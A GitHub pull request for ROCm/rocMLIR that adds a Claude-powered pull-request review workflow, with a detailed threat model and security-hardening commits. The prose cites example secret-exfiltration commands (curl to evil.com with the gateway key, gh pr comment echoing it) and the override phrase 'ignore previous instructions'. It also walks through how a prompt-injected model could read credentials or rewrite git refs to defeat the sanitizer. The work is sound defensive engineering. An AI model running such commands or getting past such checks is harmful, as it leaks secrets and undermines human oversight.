Add Claude-powered PR review GitHub Actions workflow by umangyadav · Pull Request #2375 · ROCm/rocMLIR

umangyadav · 2026-05-15T15:34:59Z

Adds a label-gated, three-workflow Claude PR review pipeline for rocMLIR. Maintainers apply the claude-review label to a same-repo PR and Claude posts line-by-line inline comments plus a top-level summary as rocmlir-pr-reviewer[bot] (a dedicated GitHub App). On re-runs, fixed issues get a "Resolved" reply, developer responses get a +1 reaction, and still-broken threads get a clarification — never a duplicate inline comment.

Architecture

Three workflows

.github/workflows/claude_auto_review.yml — the main reviewer. Triggers on pull_request: [labeled] (and workflow_dispatch as a smoke-test/escape hatch). Same-repo gated; fork PRs are skipped here. Two jobs:
- review — has the LLM Gateway secrets (ANTHROPIC_BASE_URL, LLM_GATEWAY_KEY, USER_NTID) but no GitHub write surface. Runs claude-code-action with --allowedTools "Skill,Read,Grep,Glob" (no Bash, no Write, no MCP write surface, no network). Captures the model's structured response via --json-schema, materializes it to /tmp/pr/actions.json, then sanitizes (rejects suspected secret patterns, env-var-name echoes, ANTHROPIC_BASE_URL value echoes, \``suggestion-fence injection in prose; enforces per-string byte caps via utf8bytelength`, count caps).
- post — has only contents: read on the default GITHUB_TOKEN; mints a separate rocMLIR-PR-Reviewer App installation token in-job for all comment / reply / reaction API calls. Pins checkout to ${{ github.event.repository.default_branch }} with persist-credentials: false and sparse-checkout for .github/scripts/, downloads the sanitized artifact, posts via raw gh api/gh pr comment.
- cleanup — permissions: {} on the default token; mints its own App token for the label-DELETE call. Runs if: always() so a stuck label can never block retry.
.github/workflows/claude_auto_review_perimeter_banner.yml — fires on every PR open/synchronize/reopen via pull_request_target (no checkout, no PR code execution, fixed-template comment body). When the PR diff touches the security perimeter (.github/workflows/, .github/scripts/, .claude/), applies the modifies-ci-paths label and posts a one-time banner comment listing the touched files. Banner dedup filters by both author (rocmlir-pr-reviewer[bot]) AND a hidden marker so a PR commenter can't suppress it.
.github/workflows/claude_auto_review_fork_notify.yml — fires when the claude-review label is applied to a fork PR (also pull_request_target, no checkout). The main reviewer can't run on forks under pull_request (forks have no secrets), so this companion mints the App token, posts an explanatory comment with the workflow_dispatch escape hatch link, and removes the label.

Bot identity (rocMLIR-PR-Reviewer GitHub App)

Every comment / reply / reaction is posted under the dedicated rocmlir-pr-reviewer[bot] identity, minted from the rocMLIR-PR-Reviewer GitHub App via actions/create-github-app-token@bcd2ba4 (v3.2.0, SHA-pinned). Each job that needs GitHub credentials mints its own short-lived (1h) installation token in-step from secrets.ROCMLIR_PR_REVIEWER_APP_ID + secrets.ROCMLIR_PR_REVIEWER_PRIVATE_KEY — tokens are never written to disk, never propagated between jobs (job outputs are not encrypted), and never exposed to claude-code-action's environment.

The default GITHUB_TOKEN is locked down everywhere: contents: read only where checkout is used, permissions: {} everywhere else. The App's installation permissions (configured at the org level on the App itself) are the source of truth for what this pipeline can do on the repo. A prompt-injected Claude cannot escalate via the default token because the default token has no write capability anywhere.

The bot-login string is centralized in a workflow-level env: BOT_LOGIN: 'rocmlir-pr-reviewer[bot]' and referenced by claude-code-action's allowed_bots input + the prompt's bot-identity rules + the perimeter-banner's EXPECTED_AUTHOR. The two skills carry the literal string (markdown can't reference env). If the App's slug ever changes (verify via gh api /apps/<slug>), update those four locations.

We do NOT use the Anthropic OIDC token-exchange path that would make comments appear as claude[bot] — that path requires id-token: write in the review job, which we deliberately avoid.

Why `pull_request` and NOT `pull_request_target`?

pull_request_target has a long history of CVEs caused by "checkout PR HEAD with secrets in env, then run user-controlled code". Using pull_request removes that entire CVE class for fork PRs (forks run with empty secrets) and keeps the in-workflow hardening as defense-in-depth.

pull_request introduces a different residual risk: under pull_request the workflow file ITSELF is read from PR HEAD, so a same-repo contributor can push a malicious branch that modifies the workflow to remove --allowedTools/curl evil.com $LLM_GATEWAY_KEY/etc., then wait for any maintainer with triage permission to apply claude-review. This residual is not mitigatable from inside the workflow; it's mitigated externally by three required layers (full discussion in the SECURITY MODEL block at the top of claude_auto_review.yml):

Repo configuration — CODEOWNERS protects .github/workflows/, .github/scripts/, .claude/; branch protection on develop requires code-owner review on perimeter changes; Settings → Actions → Require approval for ALL outside collaborators is enabled.
Maintainer procedure — before applying claude-review, verify the PR doesn't touch the perimeter. The perimeter-banner workflow automates this with the modifies-ci-paths label + banner comment so in practice the maintainer just looks at the labels. If the PR legitimately needs to touch .github/ or .claude/, use the workflow_dispatch path INSTEAD of the label — dispatch runs from the trusted, code-owner-approved version of the workflow on develop. The review job snapshots the PR's perimeter files to /tmp/pr-source/ before the overlay so dispatch reviews still see the PR's actual proposed contents.
In-workflow defense-in-depth — Layer-3 perimeter-block step (fails the run if the PR diff against the default branch touches the perimeter), SHA-pinned checkout (closes label-apply→checkout TOCTOU), persist-credentials: false, overlay of .claude/+.github/scripts/ from default branch, two-job split, sanitizer + JSON Schema + per-string caps + secret-pattern + URL-value scans, concurrency cancel-in-progress.

Files

File	Purpose
`.github/workflows/claude_auto_review.yml`	Main reviewer (review + post + cleanup jobs)
`.github/workflows/claude_auto_review_perimeter_banner.yml`	Layer-2 automation: label + banner on perimeter-touching PRs
`.github/workflows/claude_auto_review_fork_notify.yml`	Fork-PR UX: explain why label review doesn't run + dispatch link
`.github/scripts/sanitize_claude_actions.sh`	Per-string byte caps, count caps, secret-pattern + env-var-name + URL-value + suggestion-fence scans
`.github/scripts/secret_patterns.sh`	Shared regex catalogue (Anthropic/OpenAI/Slack/AWS/GH PAT/Azure APIM key/private-key shapes)
`.github/scripts/post_claude_review.sh`	Posts inline comments + thread updates + summary; narrow 422 handling (only "line not in diff" is soft-skipped)
`.github/CODEOWNERS`	Lists the security perimeter as code-owner-protected paths
`.claude/skills/review-rocmlir-pr/SKILL.md`	Read-only review skill: rocMLIR Critical/Major/Minor checklist (LLVM/MLIR coding standards, license headers, verifier coverage, lit/E2E test requirements, MIGraphX downstream impact). RIGHT-side comments only. Optional single-line `suggestion` field for one-click commit.
`.claude/skills/update-pr-review/SKILL.md`	Thread-aware reconciliation; `latest_reply_is_claude` gate prevents duplicate resolve/clarify on reruns
`.gitignore`	Un-ignores `.claude/skills/` so shared skills are tracked; personal Claude state stays ignored

Required repo configuration

The pipeline depends on these org/repo-level settings being in place before it can be merged:

GitHub App rocMLIR-PR-Reviewer installed on ROCm/rocMLIR with the following installation permissions:
- Repository: Pull requests — Read & write (post comments, replies, reactions, edit PR labels)
- Repository: Issues — Read & write (label add/remove uses the /issues/.../labels endpoint)
- Repository: Metadata — Read (default; required by the App framework)
Repository secrets:
- ROCMLIR_PR_REVIEWER_APP_ID — the App's numeric ID (Settings → Apps → rocMLIR-PR-Reviewer → App ID)
- ROCMLIR_PR_REVIEWER_PRIVATE_KEY — the App's PEM private key (download from the same page; entire -----BEGIN…END----- block)
- ANTHROPIC_BASE_URL, LLM_GATEWAY_KEY, USER_NTID — AMD LLM Gateway credentials (already configured per Motivation)
Branch protection on develop — require code-owner review for perimeter paths (.github/workflows/, .github/scripts/, .claude/).
Settings → Actions → General — "Require approval for ALL outside collaborators" (orthogonal mitigation for the same-repo gate).

Operational notes

To trigger a review: apply the claude-review label on a same-repo PR. The workflow runs end-to-end and the cleanup job removes the label, so re-applying retriggers.
For perimeter-touching PRs: do NOT apply claude-review (the Layer-3 guard will fail the run anyway). Instead use Actions → Claude Auto Review → Run workflow with the PR number — that path runs from develop's trusted version of the workflow.
For fork PRs: the main reviewer skips silently; the fork-notify companion posts the dispatch link.
The literal sk-ant-dummy-gateway-key in the workflow is a documented placeholder the action's input schema requires; it is ignored when ANTHROPIC_BASE_URL is set.

Motivation

Reduce review latency on rocMLIR PRs by surfacing the Critical/Major mechanical findings (LLVM/MLIR coding-standard violations, missing verifiers/tests, license-header issues, downstream MIGraphX impact) automatically, freeing human reviewers for design-level feedback. The two-job split + sanitizer + dedicated App identity makes it safe to do this on PR contents without exposing the LLM-gateway credentials to PR-controlled code or sharing a bot identity with other workflows.

Technical Details

See the SECURITY MODEL block at the top of .github/workflows/claude_auto_review.yml for the threat model and layered mitigations, and the inline comments throughout the sanitizer / post script / skills for the per-check rationale.

Test Plan

bash -n clean on all shell scripts.
yaml.safe_load clean on all three workflows.
JSON Schema in --json-schema parses; inline_comments[].side enum is ["RIGHT"] only.
Sanitizer fixture suite: legitimate payload passes; multi-byte content correctly measured by utf8bytelength; env-var-name preview redacted; ANTHROPIC_BASE_URL value scan with positive + negative cases; suggestion-fence injection in body fields rejected; secret patterns rejected.
post_claude_review.sh 422 narrowing fixture suite: real "part of the diff" 422 → soft skip exit 0; invalid commit_id 422 → hard fail; abuse-rate-limit 422 → hard fail; HTTP 500 → hard fail; "is not part of the diff" variant phrasing → soft skip.
Perimeter-banner: SIGPIPE-safe (awk instead of head -n 50) verified against a 5000-line × 10 KiB perimeter (old pipeline exits 141, new exits 0); markdown injection mitigated against adversarial filenames; banner dedup requires both rocmlir-pr-reviewer[bot] author AND marker.
App-token migration: structural assertions pass on all three workflows — every GH_TOKEN is sourced from steps.app-token.outputs.token, every Generate App token step is SHA-pinned, every app-token step appears before the first GH_TOKEN-using step, no leftover secrets.GITHUB_TOKEN, every author-filter location uses rocmlir-pr-reviewer[bot], default-token permissions never grant pull-requests: write or issues: write.
End-to-end smoke test on this PR by applying claude-review once the PR is otherwise approved AND the App is installed with the secrets configured.

Test Result

Local fixture suites all pass; smoke test pending (this PR is the canary).

Submission Checklist

Looked over the contributing guidelines at https://github.com/ROCm/ROCm/blob/develop/CONTRIBUTING.md#pull-requests.

Adds a label-gated, two-workflow pipeline that runs claude[bot] as an automated reviewer on rocMLIR PRs, posting line-by-line inline comments plus a short top-level summary. Modeled on the proven setup used in ROCm/xla. Why two workflows: - claude_trigger.yml is a tiny pull_request_target dispatcher gated on the 'claude-review' label. It does NOT check out PR contents, so a malicious PR cannot influence it. - claude_auto_review.yml is the full reviewer, triggered via repository_dispatch (and workflow_dispatch as a smoke-test escape hatch). It lives only on the default branch. The split is required because claude-code-action uses OIDC to mint a claude[bot] installation token, and Anthropic's token-exchange endpoint rejects OIDC subjects of the form repo:ORG/REPO:pull_request (what pull_request_target produces) but accepts ref-based subjects (what repository_dispatch produces). Without the indirection, comments would be posted by github-actions[bot] or fail outright. Two new Claude Code skills under .claude/skills/: - review-rocmlir-pr: read-only review skill with the rocMLIR-specific Critical/Major/Minor checklist (LLVM/MLIR coding standards, license headers, verifier coverage, lit/E2E test requirements, MIGraphX downstream impact). Emits structured findings with path/line/side/ severity/body so each becomes its own threaded inline comment. - update-pr-review: thread-aware updater. On re-runs, it posts Resolved replies on fixed issues, +1 reactions on developer responses, and clarifications on still-broken threads -- never duplicates an inline comment that was posted in a previous review. Secret hygiene: - All AMD LLM Gateway credentials flow through ${{ secrets.* }} (ANTHROPIC_BASE_URL, LLM_GATEWAY_KEY, USER_NTID). No literals in any workflow or skill file. The 'sk-ant-dummy-gateway-key' literal in claude_auto_review.yml is a documented placeholder the action's input schema requires; it is ignored when ANTHROPIC_BASE_URL is set. - Bash whitelist on the action restricts Claude to gh/git/jq/head/grep plus the inline-comment MCP tool -- no arbitrary write shell. - Permissions are minimized per workflow: contents:write on the trigger (needed only to dispatch), contents:read + pull-requests:write + id-token:write on the reviewer. The .gitignore change un-ignores .claude/skills/ specifically so the shared skills are tracked, while .claude/settings.local.json and any other personal Claude state remain ignored. Co-authored-by: Cursor <cursoragent@cursor.com>

…w iteration Addresses two review findings on the initial PR review pipeline: 1. update-pr-review iterated over fresh findings to decide thread updates, so once an old issue was fixed it disappeared from the fresh review output and Scenarios A/B (Resolved replies) were never reached. Now the skill iterates over previous Claude root comments first: missing matches in the fresh findings imply the issue is fixed -> Resolved reply; matches imply still-present -> clarification reply or skip. Genuinely-new fresh findings (no previous match) are emitted as inline comments. 2. claude_auto_review.yml exposed LLM Gateway secrets to a Claude run that read untrusted PR contents AND held shell access (Bash(gh *), Bash(jq *), etc.). A prompt-injection in any PR file could exfiltrate the gateway key via `gh pr comment $PR --body "$LLM_GATEWAY_KEY"` or even `jq -n 'env.LLM_GATEWAY_KEY'`. Restructured into two isolated jobs: Job 1 (review): has gateway secrets in env, but Claude is invoked with allowedTools restricted to Skill/Read/Grep/Glob/Write only -- no Bash, no MCP write surface, no GITHUB_TOKEN. PR data is pre-fetched in a plain shell step before Claude runs. The run output is /tmp/pr/actions.json, validated by a sanitizer step that rejects suspected secret patterns, missing schema fields, and oversized payloads. Job 2 (post): has GITHUB_TOKEN, no gateway secrets in env. Reads the artifact and posts inline comments, thread updates, and the summary via raw gh api in a plain bash script. Even if a malicious PR successfully prompt-injects Claude, the worst it can do is emit a malicious actions.json -- the sanitizer fails the build before the artifact is uploaded, and the post job has no secret to leak. New files: .github/scripts/sanitize_claude_actions.sh -- schema/size/secret-pattern validator. Tested against 10 fixtures (3 valid + 7 attack vectors). .github/scripts/post_claude_review.sh -- consumes actions.json and posts to GitHub. Skips inline comments whose line is not in the diff (HTTP 422) with a warning rather than failing the whole run. Both shell scripts pass `bash -n` syntax check; both workflow files pass actionlint clean. Co-authored-by: Cursor <cursoragent@cursor.com>

…propagation, skill tools Critical: actions/checkout in the review job persisted GITHUB_TOKEN to .git/config by default. Claude in that job has Read+Write tools, so a prompt-injected PR could read .git/config and write the token into actions.json or the execution log. Adding `persist-credentials: false` to both checkout steps removes the on-disk token. Also extended the sanitizer to detect `ghs_` installation tokens and the base64-encoded `x-access-token:ghs` prefix that `actions/checkout` writes to its http.extraheader -- belt-and-braces in case some other action re-enables credential persistence in the future. Major: review job permissions were `contents:read + id-token:write` only. Once `permissions:` is specified, all unlisted scopes default to none, so the pre-fetch step's `gh pr view`, `gh pr diff`, `gh pr checks`, and `gh api .../pulls/N/comments` calls would fail. Added `pull-requests:read` and `checks:read`. Deliberately did NOT add `pull-requests:write` -- this job must remain unable to post anything to GitHub. Major: post_claude_review.sh logged ::error:: on non-422 inline-comment failures but kept exit 0, masking partial-failure runs as green. Now tracks failures in HAD_FAILURE and exits 1 at the end if any non-skip-able post failed. Single bad inline comment no longer drops the rest of the postings (we keep going so one entry can't lose 5 good ones), but the job goes red so the failure is visible. Same treatment applied to thread updates and summary post. Open question / clarification: skill frontmatter `allowed-tools` is a permission GRANT (skip per-use approval prompts) per the Claude Code docs (https://code.claude.com/en/skills "It does not restrict which tools are available"). It does not expand the session's available-tool set, which is governed by the workflow's `--allowedTools "Skill,Read,Grep,Glob,Write"`. So skill-level Bash() entries are inert in workflow context. But they obscured the security model on first read, so removed them from both skills and added an HTML comment explaining how to invoke each skill in interactive Stage-B local dry-runs (with `claude --allowedTools "...,Bash(gh *)"`). All sanitizer fixtures still pass (12 cases now: 4 valid + 8 attack vectors, including ghs_ token and base64 x-access-token prefix). actionlint clean. Mock test of post_claude_review.sh confirms exit=1 on non-422 failure and exit=0 on 422-only (line-not-in-diff) failures. Co-authored-by: Cursor <cursoragent@cursor.com>

Critical / Major fixes from PR review: - Re-restore .github/scripts/sanitize_claude_actions.sh from origin/${default_branch} immediately before running it. Claude has Write, so the initial overlay alone could be undone by a prompt- injected PR turning the sanitizer into a no-op that approves a malicious actions.json. The fetched ref is content-addressed, so this restore is provably the trusted version even if Claude touched .git/. Step also prints the script's sha256 for forensic audit. - Pre-fetch step uses `set -euo pipefail` and writes `gh api ... > tempfile` before piping to jq. Without pipefail, a failed paginate was masked into `[]`, causing re-reviews to look like initial reviews and posting duplicate inline comments. Verified locally: simulated gh failure now exits 1 instead of silently producing [] + exit 0. - Execution-log artifact upload gated on steps.sanitize.outcome == 'success', so the raw per-tool-call transcript only ships when Claude's outputs are known clean. The sanitizer's redacted-preview stderr is still in the workflow log for failure debugging. Defense-in-depth aligned with Anthropic's published security guidance and the April 2026 "Comment and Control" CVE post-mortem (CVSS 9.4): - show_full_output: true -> false. Anthropic explicit warning that this can leak secrets through public-repo Action logs. - --max-turns 15 added to claude_args. The CVE used loop injection to both run up cost and lengthen the window for prompt-injection drift past the ~15-call mark where prompt-level constraints degrade. - Step-level timeout-minutes: 20 on the Run Claude review step (separate from the 30-minute job-level cap). - Trust-boundary preamble in the prompt naming common injection patterns ("ignore previous instructions", exfil-via-curl, hidden HTML comments, base64 blobs) and stating Claude has no Bash / network / write tools. - CLAUDE_CODE_SUBPROCESS_ENV_SCRUB=1 in the review job env, scrubbing Anthropic / cloud / GitHub Actions secrets from any subprocess Claude spawns (defense in depth even though Bash is not granted today). - SHA-pinned anthropics/claude-code-action@v1, actions/checkout@v4, actions/upload-artifact@v4, actions/download-artifact@v4 to defend against upstream-action supply-chain compromise (the same attack class as the 2025 tj-actions/changed-files incident). Verified: actionlint clean, bash -n clean on both scripts, sanitizer fixtures still pass (good payload accepted, ghs_* token rejected), silent-failure simulation confirms pipefail catches masked errors. Co-authored-by: Cursor <cursoragent@cursor.com>

Two follow-up findings on the previous hardening pass: Critical: ref-based "restore from default branch" was not actually safe. Old approach: `git restore --source="origin/${DEFAULT_BRANCH}"` to reload the sanitizer after Claude ran. The reviewer correctly pointed out that Claude with Write can rewrite .git/refs/remotes/origin/<branch> to point at a malicious commit already present in the local object DB (every commit on the PR head is fetched by actions/checkout). No SHA collision needed -- only flip the ref. The restore would then load the attacker's sanitizer. New approach: in the same step where we `git fetch`, capture the default-branch commit SHA into $GITHUB_OUTPUT (immutable -- step outputs live in the runner orchestrator, not on disk) and use `git show <SHA>:.github/scripts/<file>` to extract each sanitizer to /tmp/trusted/, then `chmod 0444` the files and `chmod 0555` the directory. The sanitize step calls `bash /tmp/trusted/...` directly, so no ref dereferencing happens at sanitize-time. This relies on POSIX permissions blocking Claude's Write tool. Verified empirically as a non-root user (the same UID class as `runner` on ubuntu-latest): fs.writeFileSync, shell `>` redirect, sibling-file creation in the locked dir, and `rm` all return EACCES; only `chmod` could break it, and Claude's allowed tools are Skill,Read,Grep,Glob,Write -- no Bash, no chmod syscall path. Documented the non-root-runner assumption in the workflow comment so anyone moving to a self-hosted runner that runs as root is warned that the protection disappears under UID 0 and they need container or mount isolation instead. Major: execution log artifact was not protected by any sanitizer. Sanitizing actions.json only gates what Claude chose to surface to GitHub. The execution transcript additionally contains every Read/Grep/Glob/Skill I/O, so a prompt-injected Read of .git/config or env-dumped tempfile contents could ride out as the artifact even after actions.json passed. Added .github/scripts/sanitize_claude_execlog.sh which runs the same secret-pattern alternation against the raw bytes of the execution log file. Refactored .github/scripts/secret_patterns.sh as the shared source-of-truth for both sanitizers (DRY -- they cannot drift apart). The execution-log upload step is now gated on BOTH steps.sanitize.outcome == 'success' AND steps.sanitize_execlog.outcome == 'success'. Verified: actionlint clean, bash -n clean on all four scripts, sanitizer fixture battery passes (good/ghs_*/Bearer/env-var-name across both sanitizers), end-to-end sanitizer execution from a chmod 0444/0555 mock of /tmp/trusted/ succeeds, and POSIX immutability against fs.writeFileSync confirmed at the syscall level on a non-root user. Co-authored-by: Cursor <cursoragent@cursor.com>

Copilot

Pull request overview

Adds a label-gated Claude PR review pipeline for rocMLIR using a pull_request_target dispatcher, a repository_dispatch reviewer workflow, sanitizer/posting scripts, and Claude Code review/update skills.

Changes:

Adds GitHub Actions workflows to dispatch, run, sanitize, and post Claude-generated PR review results.
Adds shell scripts for secret-pattern detection, action JSON validation, execution-log scanning, and GitHub comment posting.
Adds .claude/skills review/update instructions and adjusts .gitignore so shared skills are tracked.

Reviewed changes

Copilot reviewed 8 out of 9 changed files in this pull request and generated 8 comments.

Show a summary per file

File	Description
`.gitignore`	Unignores shared Claude skills while keeping other Claude state ignored.
`.github/workflows/claude_trigger.yml`	Dispatches Claude review runs when the `claude-review` label is applied.
`.github/workflows/claude_auto_review.yml`	Runs the two-job Claude review, sanitization, artifact upload, posting, and label cleanup pipeline.
`.github/scripts/secret_patterns.sh`	Defines shared secret and env-var-name regexes for sanitizer scripts.
`.github/scripts/sanitize_claude_actions.sh`	Validates and scans Claude’s `actions.json` before posting.
`.github/scripts/sanitize_claude_execlog.sh`	Scans Claude execution logs before artifact upload.
`.github/scripts/post_claude_review.sh`	Posts inline comments, thread updates, reactions, and summary comments to GitHub.
`.claude/skills/update-pr-review/SKILL.md`	Defines re-review reconciliation behavior for existing Claude review threads.
`.claude/skills/review-rocmlir-pr/SKILL.md`	Defines rocMLIR-specific review instructions and output schema.

Comments suppressed due to low confidence (1)

.github/scripts/sanitize_claude_execlog.sh:61

This error path prints the full execution-log lines that mention an LLM-Gateway env var name. If a prompt-injected transcript contains NAME=value and the value does not match one of the generic secret regexes (for example an internal base URL or user identifier), the sanitizer will fail but still leak that value into the workflow log. Redact or suppress the matching lines before echoing them.

name_hits=$(grep -E "$ENV_VAR_NAMES" -- "$LOG_FILE" | head -3 || true)
if [[ -n "$name_hits" ]]; then
  echo "::error::Execution log mentions an LLM-Gateway env var name."
  echo "::error::Refusing to upload execution-log artifact."
  echo "::error::First matches (env-var-name visibility means likely exfil attempt):"
  echo "$name_hits"
  exit 2

💡 Add Copilot custom instructions for smarter, more guided reviews. Learn how to get started.

…xeclog + concurrency) Net -132 lines across 7 files (187 ins / 319 del). Adopts upstream claude-code-action features that subsume custom code we were carrying: Path A -- drop the claude[bot] cosmetic identity: - Delete .github/workflows/claude_trigger.yml entirely. - claude_auto_review.yml triggers directly on pull_request_target: types: [labeled] with a job-level if filter on the label name. - Drop id-token: write (no Anthropic OIDC token exchange needed when authenticating to a custom gateway via static API key). - Comments now appear as github-actions[bot] instead of claude[bot]. Structured outputs replace Write + /tmp/pr/actions.json: - Add --json-schema to claude_args; the schema mirrors what the sanitizer expects (paths, lines, sides, severities, types). - Drop Write from --allowedTools (now Skill,Read,Grep,Glob). - The model's final response is captured as steps.claude-code.outputs.structured_output and materialized to /tmp/pr/actions.json by a plain shell step. - Skill files (.claude/skills/*/SKILL.md) updated to drop Write from their allowed-tools frontmatter and instruct "return as final response" instead of "write to file". This in turn makes the /tmp/trusted/ + chmod 0444 immutability mechanism unnecessary -- Claude has no Write, so the workspace copy of sanitize_claude_actions.sh cannot be tampered with mid-job. Reverts the overlay step to a simple .claude/ + .github/scripts/ git restore from the default branch and prints sha256 of the resulting scripts for forensic visibility. Drop the execution-log artifact: - Delete sanitize_claude_execlog.sh. - Drop the Sanitize Claude execution log + Upload Claude execution log steps. show_full_output: false already keeps secrets out of the workflow log UI; the unredacted execution-log artifact was a leak surface we don't actually need (debugging happens via the workflow log + the inline-comments artifact). Slim the actions sanitizer: - --json-schema now validates outer JSON shape, required keys, array types, and per-element field types/enums in the action itself. - sanitize_claude_actions.sh keeps only what the schema can't express: whole-payload size cap, per-array length caps, per-body byte cap, conditional thread_update requirements (resolve_with_reaction needs human_reply_id, clarify needs body), and the secret/env-var-name pattern scans. - Update secret_patterns.sh comment now that there's only one consumer. Add concurrency: - concurrency: { group: claude-review-<PR>, cancel-in-progress: true } cancels in-flight reviews on the same PR if a new label/dispatch event arrives. Avoids races on prev_comments.json reconciliation and prevents wasted spend when someone toggles the label. Path #3 (collapse to pull_request) was rejected: pull_request from forks has no secrets, which would break label-triggered reviews on external-contributor PRs in this public repo. Verified: actionlint clean, bash -n clean on all three remaining scripts, sanitizer fixture battery passes (good payload, ghs_* leak rejected, env-var-name rejected, clarify-without-body rejected, resolve_with_reaction-without-human_reply_id rejected, plain resolve accepted, oversized count rejected). Co-authored-by: Cursor <cursoragent@cursor.com>

…son fix Three review-feedback issues fixed. 1. Major -- re-review detection looked for the wrong bot. After the previous simplification we authenticate to GitHub with the job's GITHUB_TOKEN, which posts as github-actions[bot], not claude[bot]. But the prompt + update-pr-review skill still counted previous comments by user.login == "claude[bot]" AND in_reply_to_id == null so every re-run saw N == 0, entered initial-review mode, and would have posted a duplicate full review on every label re-application. Fix: post_claude_review.sh now appends a hidden HTML marker "" to every body it posts (inline comments, resolve / resolve_with_reaction / clarify replies, and the top-level summary). A new with_marker() helper renders body + blank line + marker; the marker is invisible in rendered markdown and is too short / too generic to trip any pattern in secret_patterns.sh (verified by sanitizer fixture). The Claude prompt's "Step 1 -- Decide review mode" now counts: user.login == "github-actions[bot]" AND .body contains "" AND in_reply_to_id == null with an explicit "do NOT match on claude[bot]" note explaining why. The update-pr-review skill mirrors the change in two places: - Claude root comments: same triple condition. - Human replies to Claude: now defined as "any in-thread reply whose body does NOT contain the marker", so our own resolve/clarify replies (which now also carry the marker) are correctly excluded from the human-replies set even though they share the github-actions[bot] author with humans replying via another Actions-driven workflow. The marker suffix is versioned (":v1") so a future body-format change that needs to invalidate previously tagged comments can bump it. 2. Major -- failed review jobs left the claude-review label stuck. Label cleanup was a step inside the post job. post has needs: review, so any failure in review (sanitizer rejection, gateway timeout, schema violation) skipped post entirely, leaving claude-review applied. Re-applying the label is a no-op for a label that's already there, so the user had no way to retry the review without first manually removing the label. Fix: extract the cleanup into its own job: cleanup: needs: [review, post] if: >- always() && github.event_name == 'pull_request_target' && github.event.label.name == 'claude-review' permissions: { pull-requests: write } always() is a status filter only -- it ignores upstream success/failure/skip but still respects the rest of the boolean expression, so we keep the label gate to avoid firing this job for every unrelated label add on every PR. 3. Minor -- failing checks were discarded from checks.json. The pre-fetch step was: if ! gh pr checks ... > checks.json 2>/dev/null; then echo '[]' > checks.json fi gh pr checks exits nonzero when any check is failing or pending, but it still writes useful JSON to stdout in that case. The previous form threw that JSON away and overwrote with [], hiding exactly the failures the reviewer needs to see. Fix: preserve stdout, ignore the rollup exit status, then validate that we ended up with parseable JSON; only fall back to [] if gh produced nothing parseable (auth failure, no checks defined yet): gh pr checks ... > checks.json 2>/dev/null || true if ! jq empty checks.json 2>/dev/null; then echo '[]' > checks.json fi Verified: - bash -n on all three remaining scripts (post / sanitize / patterns). - python3 yaml.safe_load on the workflow + the resulting job graph (review -> post -> cleanup, with cleanup's needs/if/permissions all parsed as expected). - Sanitizer fixture battery: good payload accepted; ghs_* leak, env-var-name (LLM_GATEWAY_KEY), clarify-without-body, and resolve_with_reaction-without-human_reply_id all rejected; marker-in-body fixture accepted (proves the new marker passes the secret-pattern + env-var-name scans). - with_marker() rendering check: produces body + blank line + marker. actionlint not installed locally; YAML validity + job-graph sanity checked via python yaml + a hand-walk of the if/needs/permissions fields on every job. Co-authored-by: Cursor <cursoragent@cursor.com>

…-in-depth Five review-feedback items addressed; three skipped with justification. Addressed: 1. Low-3 -- TOCTOU between label application and checkout (security). Previously the checkout used `ref: refs/pull/<n>/head`, which means the labeler approves SHA1 but actions/checkout fetches whatever the PR head is when it runs (SHA2 if a force-push lands in the gap). We then reviewed SHA2 and posted comments against SHA2, which was never approved-for-review. Same drift can happen between checkout and pre-fetch (gh pr view returns *current* head, not what we checked out), making inline-comment commit_ids point at a different commit than the diff Claude actually reviewed. Fix uses the same mechanism for both halves of the race: - Checkout step: ref: ${{ github.event.pull_request.head.sha || format('refs/pull/{0}/head', inputs.pr_number) }} For pull_request_target this is the labeler-approved SHA. For workflow_dispatch (where pull_request is null) it falls through to refs/pull/<n>/head, which is fine because the dispatcher *is* the actor (no TOCTOU). - Pre-fetch step: drop headRefOid from `gh pr view --json` and inject `git rev-parse HEAD` instead. The SHA we actually checked out is the SHA we reviewed is the SHA the post job's commit_id will reference, end-to-end, regardless of any in-flight force-push. This is also a net simplification: no separate verify step, no SHA round-trip via env or artifact. Just one expression in the checkout's `ref:` and one jq line in pre-fetch. 2. Low-4 -- gh pr checks hid real errors behind 2>/dev/null (reliability). The previous form swallowed gh's stderr unconditionally, so an auth failure or network error became "checks.json fell back to []" with no diagnostic in the workflow log -- the reviewer would silently see "0 checks" instead of a clear error pointing at the gh failure. Drop `2>/dev/null`. The existing `|| true` still prevents check-failure rollup from killing the job (which is the only reason the suppression was there); we still validate parseability with `jq empty` and fall back to [] only when gh produced nothing parseable. 3. Nit-2 -- Materialize step now jq -e gates $PAYLOAD before writing. claude-code-action's --json-schema covers this today, but if the action ever silently degrades (e.g. emits prose-wrapped JSON), $PAYLOAD could be non-empty yet unparseable. The sanitizer's `jq -e .` would still catch it one step later, but failing here gives a clearer error message ("structured_output is not valid JSON") and keeps the failure attributed to the right step. Pure defense-in-depth. 4. Nit on "write" vs "triage or higher" wording (correctness). GitHub's permission model lets triage role apply labels. Updated both the workflow header comment and the review job's `if:`-block comment to read "triage permission or higher" instead of "write permission". The trust model is unchanged -- triage+ is still a privileged role -- but the wording now matches GitHub's actual permission semantics. 5. Low-2 -- public-repo assumption documented. Added a comment on the overlay step explaining that `git fetch --depth=1 origin` works without credentials only because rocMLIR is public; if this workflow is ever ported to a private fork it will need a token. Pure documentation; no code change. Skipped with rationale: - Low-1 (`/tmp/inline_err`/`thread_err`/`summary_err` deterministic): Reviewer rated as "non-issue on GitHub-hosted runners". We run on ubuntu-latest. Switching to mktemp would add boilerplate (mktemp + rm/trap) for zero benefit on hosted runners; not worth the complexity. - Nit-1 (concurrency group key): Reviewer confirmed safe (PR_NUMBER is always a numeric type from either the pull_request payload or the workflow_dispatch input). No change needed. - Nit-3 (id-token: write removal worth a comment): Already documented at the permissions block (lines 91-93 in the review job). Verified locally: - python3 yaml.safe_load on the workflow + assertion of the new invariants (checkout ref expression, persist-credentials false, gh pr checks no longer has 2>/dev/null, locked_sha jq override present, materialize step has `jq -e .`). - bash -n on all three remaining scripts (post / sanitize / patterns). - headRefOid override smoke test: starting meta.json without headRefOid + jq override produces the locked SHA in the field the post job reads. - Materialize jq -e gate smoke test: empty payload rejected by existence check, prose-wrapped "here is the response: {...}" rejected by the new jq gate, valid JSON accepted. Co-authored-by: Cursor <cursoragent@cursor.com>

